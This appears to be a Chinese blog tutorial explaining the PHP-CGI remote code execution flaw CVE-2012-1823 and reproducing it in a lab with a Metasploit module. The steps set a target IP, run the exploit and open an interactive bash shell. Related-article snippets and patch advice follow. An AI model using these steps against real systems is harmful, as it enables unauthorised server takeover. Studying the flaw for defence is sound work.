(CVE-2012-1823)PHP-CGI远程代码执行漏洞(80端口)

最新推荐文章于 2024-06-11 16:21:13 发布
最新推荐文章于 2024-06-11 16:21:13 发布
阅读量650 收藏 10
点赞数 3
分类专栏: Web安全进阶 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62670778/article/details/138769550
版权

(CVE-2012-1823)PHP-CGI远程代码执行漏洞(80端口)

一、介绍

  • php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行
  • php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互
  • cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了fastcgi
  • fastcgi方式:fastcgi进程可以将自己一直运行在后台,并通过fastcgi协议接收数据包,执行后返回结果,但自身并不退出
  • CVE-2012-1823就是存在于以cgi模式运行的php中
  • 本质是用户请求的参数被作为了php-cgi的参数

二、漏洞影响

  • 影响版本 php < 5.3.12 or php < 5.4.2

三、原理

  • CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令

四、漏洞复现

  1. 启动metasploit
msfconsole

在这里插入图片描述

  1. 选择漏洞库
search php_cgi
use exploit/multi/http/php_cgi_arg_injection

在这里插入图片描述

  1. 设置参数,

    • 查看需要设置的参数:show options
      在这里插入图片描述

    • 设置要攻击的机器IP:set RHOST 192.168.9.147
      在这里插入图片描述

  2. 开始攻击

exploit

在这里插入图片描述

  1. 利用成功,使用shell获得终端,bash -i获得交互式终端
    在这里插入图片描述
月亮今天也很亮
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2012-1823PHP-CGI远程代码执行漏洞
weixin_45253622的博客
05-20 1338
漏洞原理 php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。 cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了
php木马扫描工具
01-15
不错的源码 先解压出来 用D盾扫一下,基本可疑的东西都能扫出来,然后自己打开看一下
CVE-2012-1823漏洞与嚣张的黑客
阿道夫的博客
03-29 324
发现该情况的第一时间已通知用户采取了相应的处置及防护措施,所幸黑客最终没有得逞,未造成严重后果。如果您还在使用以上版本的php,建议及时替换新版本,避免漏洞被黑客利用。在不影响业务的情况下,尽可能减少不必要功能和配置的开启,缩小用户对服务器的可操作空间。图6 NVD CVE-2012-1823影响的php版本范围CVE-2012-1823影响的php版本范围1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。
phpcgi 代码执行 (CVE-2012-1823) 复现
m0_49936858的博客
08-22 563
CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行在Web服务器上的程序请求数据 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。可见,获取querystring后进行解码,如果第一个字符是-则设置skip_getopt,也就是不要获取命令行参数。
PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
最新发布
做自己喜欢的事,并将其发挥到极致!
06-11 1710
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码
PHP-CGI远程代码执行漏洞CVE-2012-1823
鲨鱼辣椒的博客
06-09 1990
CGI是什么? CGI(Common Gateway Interface)公共网关接口,是web服务器运行时外部程序的规范,几乎所有的服务器都支持CGI,也可以用r
php-cgi是干什么的?底层原理是什么?
长风破浪会有时的博客
05-10 961
它使用 Common Gateway Interface(CGI)协议来与 web 服务器进行通信,接收来自 web 服务器的 HTTP 请求并处理 PHP 脚本,最终将结果返回给 web 服务器。进程会使用 PHP 内置的解释器,将 PHP 代码解释为可执行的指令。通常被用作 PHP 的后端解释器,将 PHP 脚本解释为可执行的指令,然后通过 FastCGI 协议与 web 服务器通信,处理来自客户端的请求。进程会解析请求中包含的 PHP 脚本,并将其转换为可执行的指令。
常见漏洞原理简介
m0_61869253的博客
06-17 1021
无法被Apache解析,就会被Apache服务器解析成php文件,问题是apache如果在mime.types文件里面没有定义的扩展名在诸如x1.x2.x3的情况下,最后一个x3的没有定义,他会给解析成倒数第二个的x2的定义的扩展名。目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。
PHP-CGI远程代码执行漏洞分析与防范
10-19
本文给大家介绍的是PHP-CGI远程代码执行漏洞CVE-2012-1823)分析和防范,这是最近爆出的一个php的比较严重的漏洞,这里分享给大家。
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
[Vulhub](CVE-2012-1823PHP-CGI远程代码执行漏洞
weixin_45605352的博客
03-28 1581
首先理解一下CGI的概念: CGICGI 全称是“公共网关接口”(Common Gateway Interface),HTTP 服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。 CGI 可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如 PHP, Perl, Tcl 等。 作用: CGI是一种根据请求信息动态产生回应内容的技术。 通过CGI,Web服务器可以根据请求不同启动不同的外部程序,并将请求内容转发给该程序,在程序执行结束后,将执行结果作为回应返
php远程代码执行漏洞绕过,PHP远程代码执行漏洞:CVE
weixin_42127754的博客
03-19 267
漏洞详情:Nginx上fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致PATH_INFO为空。而php-fpm在处理PATH_INFO为空的情况下,存在逻辑缺陷,可以远程代码执行。影响范围:Nginx+php-fpm的服务器,在使用如下配置的情况下,都可能存在远程代码执行漏洞。location ~ [^/]\.php(/|$) {fastcg...
php配置 php-cgi.sock使用
懒人博客
03-28 4383
php配置 php-cgi.sock使用 PHP配置文件: [global] pid = /run/php-fpm/php-fpm.pid error_log = /var/log/php-fpm/php-fpm.log log_level = notice [www] listen = /dev/shm/php-cgi.sock listen.backlog = -1 listen....
CVE-2012-1823 php-cgi远程代码执行
cnbird's blog
12-22 2504
CVE-2012-1823php-cgi远程代码执行,FastCGI不受影响。PHP官方暂时未发布补丁,请受影响的站长按文章下方提供的方式打好临时补丁。 http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ via:knownsec POC: 1、本地包含直接执行代码: curl -H "USER-AGENT: " h
CVE-2012-1823PHP-CGI RCE)的PoC及技术挑战
Yatere的天平秤
05-07 2070
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/  粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。  另外关于RC
PHP 远程代码执行漏洞(CVE-2022-31625)修复办法
07-14
针对PHP远程代码执行漏洞(CVE-2022-31625),以下是一些修复方法: 1. 更新到最新版本:确保你的PHP版本是最新的,因为漏洞修复通常会包含在更新中。请访问PHP官方网站或者使用包管理工具来获取最新版本。 2. 禁用危险函数:在php.ini配置文件中,禁用危险函数可以帮助防止远程代码执行。可以使用disable_functions指令来禁用一些敏感函数,如eval()、exec()、system()等。 3. 安全配置:检查你的PHP配置文件,确保安全设置已经启用。例如,禁用动态加载扩展、限制文件上传目录和大小、禁用远程文件包含等。 4. 输入验证和过滤:在你的应用程序中对用户输入进行严格的验证和过滤,以防止恶意代码注入。 5. 使用安全框架或库:使用安全框架或库来帮助防止远程代码执行漏洞。这些框架通常提供安全的默认配置和内置的安全功能。 6. 定期更新和监控:定期检查并更新你的应用程序和相关组件,以确保及时修复已知漏洞。同时,监控应用程序的日志和网络流量,以便及时发现异常行为。 请注意,这些方法只是一些常用的修复措施,具体的修复方法可能会因系统配置和应用程序的特定情况而有所不同。建议在修复漏洞之前,先进行充分的测试和备份。此外,如果你不确定如何处理或无法解决该漏洞,请咨询安全专家或PHP开发人员的帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值